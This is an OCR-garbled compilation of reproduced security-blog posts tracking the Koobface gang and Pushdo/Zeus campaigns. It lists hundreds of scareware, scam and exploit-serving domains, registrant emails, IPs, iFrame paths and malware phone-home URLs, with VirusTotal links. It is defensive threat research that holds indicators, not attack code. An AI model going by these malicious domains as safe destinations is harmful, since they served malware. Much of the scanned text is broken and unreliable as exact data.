only-loveall .com - Email: potenciallio@safe-mail.net 

and-i-loveyoutoo .com - Email: potenciallio@safe-mail.net 

andiloveyoutoo .com - Email: menorstlO@yahoo.com 

romantic-love-forever .com - Email: potenciallio@safe- 
mail.net 

love-youloves .com - Email: potenciallio@safe-mail.net 

love-galaxys .com - Email: potenciallio@safe-mail.net 

love-formeandyou .com - Email: potenciallio@safe- 
mail.net 

ifound-thelove .net - Email: potenciallio@safe-mail.net 
findloveon .net - Email: wersers@yahoo.com 
love-isexcellent .net - Email: potenciallio@safe-mail.net 
Could it get even more malicious and fraudulent than that? 
Appreciate my rhetoric. 


The same email 
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(potenciallio@safe-mail.net) that was used to register the 
dating scam domains was also [26fused to register exploit 
serving domains at 195.88.190.247, [27]participate in 
phishing campaigns, and register a [28]money mule 
recruitment site for the non-existent [29]Allied Insurance 
LLC. (Allied Group, Inc.). 

Of course, the money made in process looks like pocket 
change compared to the money they gang makes 

through blackhat SEO, click fraud and scareware in general - 
go through the related posts at the bottom of the 

article. But since they've previously indicated what I 
originally anticipated they'll do sooner or later, namely, start 
diversifying and experimenting due to the ever-growing 
compromised infrastructure, what they'll do next on the 

Mac front is an issue worth keeping an eye on. 

Related Koobface gang/botnet research: 

[30] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[31] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[32] Koobface Botnet Starts Serving Client-Side Exploits 

[33] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[34] Koobface Botnet's Scareware Business Model - Part Two 

[35] Koobface Botnet's Scareware Business Model - Part One 



[36] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[37] New Koobface campaign spoofs Adobe's Flash updater 

[38] Social engineering tactics of the Koobface botnet 

[39] Koobface Botnet Dissected in a TrendMicro Report 

[40] Movement on the Koobface Front - Part Two 

[41] Movement on the Koobface Front 

[42] Koobface - Come Out, Come Out, Wherever You Are 

[43] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [44]Dancho Danchev's 
blog. Follow him [45Jon Twitter. 
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4. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnet- 
starts-servin a -client.html 
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PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild (2010-02-03 22:42) 

Pushdo/Cutwail's customers, or perhaps the botnet masters 
themselves, continue rotating the malware campaigns, 

with the very latest one using a 11 Photo Archive #2070735" 
theme, and continuing to server client-side exploits hosted 
within crimeware-friendly networks it's time we profile and 
expose. 

• [l]Extensive list of the domains/subdomains involved at 
Gary Warner's blog. 
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Photo Archives Hosting describes itself as: 

11 Photos Archives Hosting has a zero-tolerance policy against 
ILLEGAL content. AH archives and links are provided by 3rd 
parties. We have no control over the content of these pages. 
We take no responsibility for the content on any website 
which we link to, please use your own discretion while 
surfing the links. © 2007-2009, Photos Archives Hosting 
Group, Inc.-ALL RIGHTS RESERVED. " 

- Sample URL: 

photoshock. Mai wareDomain/idl073bv/get.php? 
email= 


- Sample iFrame from this week's campaign: 109.95.115.36 
/usasp22/in.php 

-[2] Sample iFrame from last week: 109.95.114 .251 
/usOld/; 109.95.115.36 /usasp/in.php 

-[3] Sample iFrame used two weeks ago: 109.95.114 
.251/uksl/in.php 

- Detection rate: PhotoArchive.exe ([4]Trojan- 
Spy.Win32.Zbot); dropped file.exe ([5]Trojan-Spy.Win32.Zbot) 

Upon execution, it drops C:\WINDOWS\system32\sdra64.exe; 
C:\WINDOWS\system32\lowseckslashuser.ds.lll and 

phones back to the [6]Zeus-crimeware serving: horosta 
.ru/cbd/nekovo.bri ; horosta .ru/ip.php - 109.95.115.19 

Email: bernardo _pr@inbox.ru 

Who's offering the hosting infrastructure for the actual 
domains/malware binaries and nameservers? 

- [7]AS50215 (TROYAK-AS Starchenko Roman Fedorovich) - 
[8]profiled here 

- [9]109.95.112.0/22 - [10]AS50369 - VISHCLUB-as 
Kanyovskiy Andriy Yuriyovich 

- 193.104.41.0/24 - [11]AS49934 - VVPN-AS PE Voronov 
Evgen Sergiyovich 

- [12]91.200.164.0/22 - [13]AS47560 - VESTEH-NET-as 
Vesteh LLC 

What's worth pointing out is that 11 TROYAK-AS Starchenko 
Roman Fedorovich" is positioning itself as 



[14] Ethernet,home,LAN,net,provider,ISP,Homenet provider at 

[15] ctlan.net. 

Just like the " /"-Z^ JFake Web Host¬ 
ing Provider - Front-end to Scareware Blackhat SEO 
Campaign at Biogspot' and 11 [17]GazTranzitStroylnfo - a Fake 
Russian Gas Company Facilitating Cybercrime" 

All of the involved domains have already been blacklisted by 
the Zeus Tracker. However, with the campaign¬ 
ers at large, what's TROYAK-AS today, will be yet another 
cybecrime-friendly AS tomorrow. 
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Related posts: 

[18] Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits 

[19] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[20] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[21] Pushdo Injecting Bogus Swine Flu Vaccine 

[22] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[23] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[24] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 



This post has been reproduced from [25]Dancho Danchev's 
blog. Follow him [26Jon Twitter. 
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A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

(2010-02-04 00:50) 

With [l]scareware/rogueware/fake security software 
continuing to be the cash-cow choice for the Koobface gang, 

keeping them on a short leash in order to become the 
biggest [2]opportunity cost for the gang's business model is 
crucial. The following are currently active blackhat SEO 
redirectors/Koobface-infected hosts redirectors and actual 
scareware domains courtesy of the gang. 
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Blackhat SEO redirectors, also embedded at Koobface- 
infected hosts, with identical redirector ID (?pid=312s02 

&sid=4dbl2f): 

fordusedsales .com - 193.104.106.250 - Email: 
test@now.net.cn 















buylexuscustoms .com - 91.212.226.185 - Email: 
test@now.net.cn 

tracegirlsonline .com - 89.248.168.22 - Email: 
test@now.net.cn 

skypetollfree .com - 96.44.128.245 - Email: 
test@now.net.cn 

dendy-trens .com - Email: test@now.net.cn 

pretendtolove .com - Email: test@now.net.cn 

bewareoffreebies .com - Email: test@now.net.cn 

harry-the-potter .com - Email: test@now.net.cn 

getlancomediscount .com - Email: 
baldwinnere@yahoo.co.uk 

vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 
Iady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletvmodeltoys .com - Email: 
CourtneyRWebb@aol.com 

volvomodeltoys .com - Email: CourtneyRWebb@aol.com 

manilawebcamera .com - Email: monkey22@live.com 

mumbaiwebcamera .com - Email: monkey22@live.com 

karachiwebcamera .com - Email: monkey22@live.com 

delhiwebcamera .com - Email: monkey22@live.com 

istanbulwebcamera .com - Email: monkey22@live.com 

lexusmodeltoys .com - Email: monkey22@live.com 

chevroletvmodeltoys .com - Email: 
CourtneyRWebb@aol.com 

bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 

Upon redirection, the scareware is served from malware-b- 
scan .com - 96.44.128.245; 91.212.226.97; 

91.212.226.185; 91.121.45.67, 91.212.226.203, 
94.228.209.195 - Email: mail@bristonnews.com. 
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Sample detection rate for newly introduced scareware 
samples: [3]Setup _312s2.exe - Result: 3/40 (7.5 %), 

[4]Setup _312s2.exe - Result: 4/39, [5]Setup 
_312s22.exe - Result: 2/39 (5.13 %), [6]Setup _312s2.exe 


- Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 

1/40 (2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), 
[9]Setup _312s2.exe - Result: 3/39 (7.7 %). [10]Setup 
_312s2.exe - Result: 4/40 (10 %), [ll]Setup _312s2.exe - 
Result: 1/40 (2.5 %), [12]Setup _312s2.exe - Result: 4/40 
(10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup _312s2.exe - Result: 5/41 (12.2 %), [15]Setup 
_312s2.exe - Result: 5/41 (12.2 %), [16]Setup _312s2.exe 

- Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 

4/41 (9.76 %), [18]Setup _312s2.exe - Result: 5/41 (12.2 
%), [19]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[20]Setup _312s2.exe - Result: 3/41 (7.32 %), [21]Setup 
_312s2.exe - Result: 6/41 (14.63 %). 

Upon execution the sample phones back to winxp7server 
.com/download/winlogo.bmp - 94.228.208.57; rescuesy- 
supdate .com/?b=312s2 - 83.133.125.216. The most 
recent samples ( Wednesday, February 10, 2010 ) phone back 

to wintimeserver .com/?b=312s2 - 91.212.226.125 and 
firmwaredownloadserver .com/download/winlogo.bmp 

- 94.228.208.57. 

The most recent samples ( Sunday, February 21, 2010) 
phone back to firmwaredown- 

loadserver.com /download/winlogo.bmp - 

94.228.208.57; 

shifustserver.com /download/winlogo.bmp - 

94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 
The 


most 



recent 


samples 
( Friday , 

February 
12 ,, 

2010 ) 

phone 

back 

to 

firmwaredownloadserver 

.com/download/winlogo.bmp - 94.228.208.57; 
checklatestversion .com/?b=312s - 109.232.225.75 
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Parked on the same IPs are more scareware domains part of 
the portfolio: 

195.5.161.107/psxl/?vih = = RAND0M _STRINGS - no 
domain name 

91.212.132.241 /psxl/?vih = = RANDOM STRINGS 
195.5.161.105 /psxl/?vih = = RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn 


zin-antivirus-scan .com - Email: test@now.net.cn 
nextgen-scannert .com - Email: test@now.net.cn 
protectionl5scan .com - Email: test@now.net.cn 
nitro-antispyware .com - Email: test@now.net.cn 
z2-antispyware .com - Email: test@now.net.cn 
spy-detectore .com - Email: admin@clossingt.com 
dis7-antivirus .com - Email: admin@vertigosmart.com 
v2comp-scanner .com - Email: admin@vertigosmart.com 
new-av-scannere .com - Email: missbarlingmail@aol.com 
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smartvirus-scan6 .com - Email: info@terranova.com 

spywaremaxscan4 .com - Email: out@trialzoom.com 

super6antispyware .com - Email: mail@ordercom.com 

spyware-max-scan3 .com - Email: out@trialzoom.com 

max-antivirus-security5 .com - Email: 
mail@dynadoter.com 

winterdiscounts5 .com - Email: mail@haselbladtour.com 
11-antivirus .com - Email: call555call@live.com 
1-antivirus .com - Email: call555call@live.com 
lm-online-scanner .com - Email: stellar2@yahoo.com 



2m-online-scanner .com - Email: stellar2@yahoo.com 
2pro-antispyware .com - Email: mail@yahoo.com 
3pro-antispyware .com - Email: mail@yahoo.com 

6- antivirus .com - Email: call555call@live.com 

7- antivirus .com - Email: call555call@live.com 
9-antivirus .com - Email: call555call@live.com 
aO-online-scanner .com - Email: stellar2@yahoo.com 
a9-online-scanner .com - Email: stellar2@yahoo.com 
aa-antivirus .com - Email: call555call@live.com 
aa-online-scanner .com - Email: call555call@live.com 
ab-antivirus .com - Email: call555call@live.com 
ac-antivirus .com - Email: call555call@live.com 
ad-antivirus .com - Email: call555call@live.com 
advl-system-scanner .com - Email: JayRKibbe@live.com 
adv2-system-scanner .com - Email: JayRKibbe@live.com 
ae-antivirus .com - Email: call555call@live.com 
antivirus-expert-a .com - Email: 900ekony@live.com 
antivirus-expert-i .com - Email: 900ekony@live.com 
antivirus-expert-r .com - Email: 900ekony@live.com 
antivirus-expert-y .com - Email: 900ekony@live.com 



antivirussystemscanl .com - Email: 900ekony@live.com 

antivirussystemscana .com - Email: 900ekony@live.com 

army-antispywarea .com - Email: beliec99@yahoo.com 

army-antispywarei .com - Email: beliec99@yahoo.com 

army-antispywarel .com - Email: beliec99@yahoo.com 

army-antispywarep .com - Email: beliec99@yahoo.com 

army-antivirusa .com - Email: beliec99@yahoo.com 

army-antivirusd .com - Email: beliec99@yahoo.com 

army-antivirust .com - Email: beliec99@yahoo.com 

army-antivirusv .com - Email: beliec99@yahoo.com 

army-antivirusy .com - Email: beliec99@yahoo.com 

bl-online-scanner .com - Email: stellar2@yahoo.com 

best-antiviruskO .com 

bestpd-virusscanner .com - Email: 
SusanCWagner@yahoo.com 

bestpr-virusscanner .com - Email: 
SusanCWagner@yahoo.com 

crystal-antimalware .com - Email: mail@vertigocats.com 
crystal-antivirus .com - Email: mail@vertigocats.com 
crystal-pro-scan .com - Email: mail@vertigocats.com 
crystal-pro-scanner .com - Email: mail@vertigocats.com 



crystal-spyscanner .com - Email: mail@vertigocats.com 
69 

crystal-threatscanner .com - Email: 
mail@vertigocats.com 

crystal-virusscanner .com - Email: mail@vertigocats.com 

extra-spyware-defencea .com - Email: fabula8@live.com 

extra-spyware-defenceb .com - Email: fabula8@live.com 

malware-a-scan .com - Email: mail@bristonnews.com 

malware-b-scan .com - Email: mail@bristonnews.com 

malware-c-scan .com - Email: mail@bristonnews.com 

malware-d-scan .com - Email: mail@bristonnews.com 

malware-t-scan .com - Email: mail@bristonnews.com 

mega-antispywarea .com - Email: fabula8@live.com 

mega-antispywareb .com - Email: fabula8@live.com 

mm-online-scanner .com - Email: stellar2@yahoo.com 

my-computer-antivirusa .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusb .com - Email: 
dillinzerl@yahoo.com 

my-computer-antiviruse .com - Email: 
dillinzerl@yahoo.com 



my-computer-antivirusq .com - Email 
dill inzerl@yahoo.com 

my-computer-antivirusw .com - Email 
dillinzerl@yahoo.com 



my-computer-scanc .com - Email: 
cl intommai 12@yahoo.com 

my-computer-scane .com - Email: 
clintommail2@yahoo.com 

my-computer-scanl .com - Email: 
clintommail2@yahoo.com 

my-computer-scannera .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerl .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerm .com - Email: 
clintommail2@yahoo.com 

my-computer-scannern .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerv .com - Email: 
clintommail2@yahoo.com 

my-computer-scanw .com - Email: 
clintommail2@yahoo.com 

my-pc-online-scanm .com - Email: dillinzerl@yahoo.com 
my-pc-online-scann .com - Email: dillinzerl@yahoo.com 
my-pc-online-scanr .com - Email: dillinzerl@yahoo.com 
my-pc-online-scanv .com - Email: dillinzerl@yahoo.com 
nl-system-scanner .com - Email: JayRKibbe@live.com 



n2-system-scanner .com - Email: JayRKibbe@live.com 

nasa-antivirusl .com - Email: call555call@live.com 

nasa-antivirus3 .com - Email: call555call@live.com 

nasa-antivirusa .com - Email: call555call@live.com 

nasa-antivirusb .com - Email: call555call@live.com 

nasa-antiviruso .com - Email: call555call@live.com 

pcl-system-scanner .com - Email: JayRKibbe@live.com 

pc2-system-scanner .com - Email: JayRKibbe@live.com 

proO-antivirus .com - Email: mail@yahoo.com 

proO-system-scanner .com - Email: JayRKibbe@live.com 

prol-system-scanner .com - Email: JayRKibbe@live.com 

pro2-antivirus .com - Email: mail@yahoo.com 

pro4-antivirus .com - Email: mail@yahoo.com 

pro6-antivirus .com - Email: mail@yahoo.com 

pro8-antivirus .com - Email: mail@yahoo.com 

remote-antispywarec .com - Email: 
teresa2mail.me@live.com 

remote-antispywared .com - Email: 
teresa2mail.me@live.com 

remote-antispywaree .com - Email: 
teresa2mail.me@live.com 
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run-antivirusscanO.com 



-► AS47869 


remote-antispywarey .com - Email: 
teresa2mail.me@live.com 

remote-pcl-scanner .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannera .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannerr .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannerv .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannery .com - Email: 
teresa2mail.me@live.com 






scan3antispyware .com - Email: o@mozzilastuf.com 

scan6antispyware .com - Email: o@mozzilastuf.com 

scan8antispyware .com - Email: o@mozzilastuf.com 

scan-antispywarea .com - Email: o@mozzilastuf.com 

scan-antispywarec .com - Email: o@mozzilastuf.com 

scan-antispywared .com - Email: o@mozzilastuf.com 

scan-antispywarez .com - Email: o@mozzilastuf.com 

spyware-01-scanner .com - Email: mail@bristonnews.com 

spyware-03-scanner .com - Email: mail@bristonnews.com 

spyware-05-scanner .com - Email: mail@bristonnews.com 

spyware-06-scanner .com - Email: mail@bristonnews.com 

spyware-07-scanner .com - Email: mail@bristonnews.com 

stcanning-your-computerc .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerd .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerq .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerr .com - Email: 
mitra66@yahoo.com 

stcanning-your-computert .com - Email: 
mitra66@yahoo.com 
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stcanning-your-pca .com - Email: mitra66@yahoo.com 

stcanning-your-pcb .com - Email: mitra66@yahoo.com 

stcanning-your-pcc .com - Email: mitra66@yahoo.com 

stcanning-your-pcd .com - Email: mitra66@yahoo.com 

stcanning-your-pce .com - Email: mitra66@yahoo.com 

stealthvl-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv2-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv7-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv8-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv9-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

verl-system-scanner .com - Email: JayRKibbe@live.com 
ver2-system-scanner .com - Email: JayRKibbe@live.com 
virus-al-scanner .com - Email: mail@bristonnews.com 
virus-al-scanner .com - Email: mail@bristonnews.com 
virus-bl-scanner .com - Email: mail@bristonnews.com 
virus-bl-scanner .com - Email: mail@bristonnews.com 



virus-cl-scanner .com - Email: mail@bristonnews.com 

virus-cl-scanner .com - Email: mail@bristonnews.com 

virus-dl-scanner .com - Email: mail@bristonnews.com 

virus-dl-scanner .com - Email: mail@bristonnews.com 

virus-e2-scanner .com - Email: mail@bristonnews.com 

virus-e2-scanner .com - Email: mail@bristonnews.com 

windowsv5-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv6-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv7-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv8-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv9-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

zO-online-scanner .com - Email: stellar2@yahoo.com 
zl-online-scanner .com - Email: stellar2@yahoo.com 
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Active scareware domains portfolio (blackhat SEO/Koobface 
pushed) parked at [22]212.150.164.190 - AS1680 - 

NV-ASN 013 NetVision Ltd : 

antispy-download .org - Email: 
robertsimonkroon@gmail.com 








scanner-virus-free .org - Email: 
robertsi monkroon@gmail.com 

tube-best-porn .org - Email: robertsimonkroon@gmail.com 

tube-sex-porn .org - Email: robertsimonkroon@gmail.com 

download-free-files .org - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .org - Email: robertsimonkroon@gmail.com 

scan-your-pc-now .org - Email: michaeltycoon@gmail.com 

scanner-virus-free .com - Email: 
robertsimonkroon@gmail.com 

tube-sex-porn .com - Email: robertsimonkroon@gmail.com 

scanner-free-virus .com - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .com - Email: 
robertsimonkroon@gmail.com 

antispy-download .info - Email: 
robertsimonkroon@gmail.com 

soft-download-free .info - Email: 
robertsimonkroon@gmail.com 
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scanner-virus-free .info - Email: 
robertsimonkroon@gmail.com 

scanner-free-virus .info - Email: 
robertsimonkroon@gmail.com 



scan-your-pc-now .info - Email: 
michaeltycoon@gmail.com 

adult-tube-free .net - Email: michaeltycoon@gmail.com 

scanner-virus-free .net - Email: 
robertsimonkroon@gmail.com 

tube-sex-porn .net - Email: robertsimonkroon@gmail.com 

download-free-files .net - Email: 
michaeltycoon@gmail.com 

scanner-free-virus .net - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .net - Email: robertsimonkroon@gmail.com 

ekjsoft .eu - Email: robertsimonkroon@gmail.com 

antispy-download .biz - Email: 
robertsimonkroon@gmail.com 

soft-download-free .biz - Email: 
robertsimonkroon@gmail.com 

scanner-virus-free .biz - Email: 
robertsimonkroon@gmail.com 

free-malware-scan .biz - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .biz - Email: robertsimonkroon@gmail.com 

tube-sex-porn .biz - Email: robertsimonkroon@gmail.com 

download-free-files .biz - Email: 
michaeltycoon@gmail.com 
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scanner-free-virus .biz - Email: 
robertsi monkroon@gmail.com 

download-free-soft .biz - Email: 
robertsi monkroon@gmail.com 


tube-porn-best .biz - Email: robertsimonkroon@gmail.com 



scan-your-pc-now .biz - Email: michaeltycoon@gmail.com 

porn-tube-sex .biz - Email: robertsimonkroon@gmail.com 

alrzsoft .in - Email: petrenko.kolia@yandex.ru 

antispy-download .biz - Email: 
robertsimonkroon@gmail.com 

cool-tube-porn .net - Email: robertsimonkroon@gmail.com 

cool-tube-porn .org - Email: robertsimonkroon@gmail.com 

download-free-now .net - Email: 
robertsimonkroon@gmail.com 

download-free-now .org - Email: 
robertsimonkroon@gmail.com 

download-free-soft .com - Email: 
robertsimonkroon@gmail.com 

download-free-soft .net - Email: 
robertsimonkroon@gmail.com 

download-scaner-free .com - Email: 
robertsimonkroon@gmail.com 

ekjsoft .eu 
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my films 

mv films 
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fdglsoft .in - Email: petrenko.kolia@yandex.ru 

free-virus-scanner .net - Email: 
robertsimonkroon@gmail.com 

kleqsoft .in - Email: petrenko.kolia@yandex.ru 

kltysoft .in - Email: petrenko.kolia@yandex.ru 

ktyjsoft .in - Email: petrenko.kolia@yandex.ru 

kyezsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrjsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrtsoft .in - Email: petrenko.kolia@yandex.ru 

mgtlsoft .in - Email: petrenko.kolia@yandex.ru 




porn-sex-tube .net - Email: robertsimonkroon@gmail.com 

porn-sex-tube .org - Email: robertsimonkroon@gmail.com 

scan-free-malware .net - Email: 
robertsimonkroon@gmail.com 

scan-free-malware .org - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .com - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .info - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .net - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .org - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .biz - Email: robertsimonkroon@gmail.com 

tube-best-porn .com - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .net - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
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tube-porn-sex .info - Email: robertsimonkroon@gmail.com 
tube-porn-sex .net - Email: robertsimonkroon@gmail.com 
tube-porn-sex .org - Email: robertsimonkroon@gmail.com 



What's so special about the 

robertsimonkroon@gmail.com email anyway? 

It's the fact that not only was 

[23]the email was once again used to register [24]scareware 
domains two times in July, 2009, but also, as pointed out in 
November 2009's "[25]Koobface Botnet's Scareware Business 
Model - Part Two", the same email was used to register the 
following download locations for scareware domains pushed 
by the Koobface botnet: 

0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmaii.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com 
kt4lwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com 
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 
4go4i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 
kzvi4iiutrlle .cn - Email: robertsimonkroon@gmail.com 
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 



mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 

mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 

fb7pxcqyb45oe .cn - Email: robertsimonkroon@gmail.com 

fyivbrl3b0dyf.cn - Email: robertsimonkroon@gmail.com 

z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com 

ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com 

p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 

gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 

fluqldfi3qkcm .cn - Email: robertsimonkroon@gmail.com 

7mxlz5jq0nt3o .cn - Email: robertsimonkroon@gmail.com 

3uxyctrlmiqeo .cn - Email: robertsimonkroon@gmail.com 

p0umob9k2g7mp .cn - Email: 
robertsimonkroon@gmail. com 

od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com 

bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 

7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com 

Stay tuned for a massive Koobface related activities 
update, analyzing the gang's multi-tasking 
throughout 

the entire January, 2010 - descriptive historical OSINT 
offers long-term value in cross-checking for 
connections. 



Related Koobface gang/botnet research: 

[26] How the Koobface Gang Monetizes Mac OS X Traffic 

[27] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[28] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[29] Koobface Botnet Starts Serving Client-Side Exploits 

[30] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[31] Koobface Botnet's Scareware Business Model - Part Two 

[32] Koobface Botnet's Scareware Business Model - Part One 
77 

[33] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[34] New Koobface campaign spoofs Adobe's Flash updater 

[35] Social engineering tactics of the Koobface botnet 

[36] Koobface Botnet Dissected in a TrendMicro Report 

[37] Movement on the Koobface Front - Part Two 

[38] Movement on the Koobface Front 

[39] Koobface - Come Out, Come Out, Wherever You Are 

[40] Dissecting Koobface Worm's Twitter Campaign 



The Diverse Portfolio of Fake Security Software 
Series: 


[41 ]A Diverse Portfo 
Twenty Four 
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[46] A Diverse Portfo 
Nineteen 
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[52] A Diverse Portfo 
Thirteen 


o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 

o of Fake Security 
o of Fake Security 

o of Fake Security 


Software - Part 

Software - Part 

Software - Part 

Software - Part 

Software - Part 

Software - Part 

Software - Part 

Software - Part 

Software - Part 

Software - Part Fifteen 
Software - Part 

Software - Part 





[53] A Diverse Portfo 

[54] A Diverse Portfo 

[55] A Diverse Portfo 

[56] A Diverse Portfo 

[57] A Diverse Portfo 

[58] A Diverse Portfo 

[59] A Diverse Portfo 

[60] A Diverse Portfo 
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[63] A Diverse Portfolio of Fake Security Software - Part Two 

[64] Diverse Portfolio of Fake Security Software 

This post has been reproduced from [65]Dancho Danchev's 
blog. Follow him [66Jon Twitter. 
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3. 


http://www.virustotal.com/analisis/bl57a41bcaf22d404785e 

2e4a7e0d235c9c5d5Q88f687772498f6eef5283e65e-12651 

47897 


4 . 















http://www.vi rustotal .com/anal isis/8562 070059a98634689e 

Qa457a90b6cd93213efa595e6f33520ab233e5d6abll- 

12653 

08914 

5. 

http://www.virustotal.com/analisis/8e4eld0382dda2c2f2ccc9 

ff9aab275b96fc91e978e6e!901f81bd3e658cd9cf-12653 

33130 

6 . 

http://www.virustotal.com/analisis/3del601c9dd4fb69e079b 

9f451dad4bcc99b8566f95c9d6d88549262a32b5681-12653 

85013 

7. 

http://www.virustotal.com/analisis/60b03b5b451bb4fla6c4b 

e8c9997a806113c0832bfca04bedeea447699af6012-12654 

07256 

8 . 
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Z8 

20621 
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http://www.vi rustotal.com/analisis/c5a59b3ee6b4da2fa9f5cb 

51bdf27dd59a560b3e857b6c2142e0bl546c66fec4-12654 


76116 

10 . 

http://www.virustotal.com/analisis/6ee2be84c8df4622de09f7 

53b0032e4eb88ab7b862eb2dc98e3b924d3d513618-12655 

06080 

11 . 

http://www.virustotal.com/analisis/5122cef5ff65e00212c29c 

9d6b61a73d2cdc7004e76a75ebec44469464fceeb0-12655 

78417 

12 . 

http://www.virustotal.com/analisis/47351336cc4408d20d243 

1330a409b74369bebfd40b926eb23e4f4a65d9f7697-12656 

52899 

13. 

http://www.virustotal.com/analisis/6640370dbabddlf206931 

588eafd9172566d0047b2c2857353148c70eba61046-12658 

23028 

14. 

http://www.virustotal.com/analisis/3e289a5c06258aca2a21e 

6cb9bff670d21345250d4e7efde98f3769al7dfa6ef-12658 

45020 

15. 

http://www.virustotal.com/analisis/d893e69082e5553d6881 

6afc75990d2bcfc56fb0455f0689caac380dbb0720ce-12659 






















08933 


16. 

http://www.virustotal.com/analisis/99c63f4333fe748b59e040 

ba450d943da9836b5d3flb3612683d9fcbec5b75fd-12659 

31797 

17. 

http://www.virustotal.com/analisis/47af520feea8efeec59325f 

7cdedl6af42b2cb459c34ddel21098e222332dblf-12660 

00454 

18. 

http://www.virustotal.com/analisis/5a4a50d2e4al023a8b80f 

2fb2bb68b31ebbf71b6a5127018e9656da6a0cl0cfd-12660 

17625 

19. 

http://www.virustotal.com/analisis/a7523cd6a95be9efbf7d2a 

225 Iadeb0ebe032680f4323cc09065c740bbd 18166-12665 

20546 

20 . 

http://www.virustotal.com/analisis/ab049035d0ca70b6679a5 

dd 138132e9bal95fcel 393 lff44d 142 5967042 373 lf-12 667 

97102 

21 . 

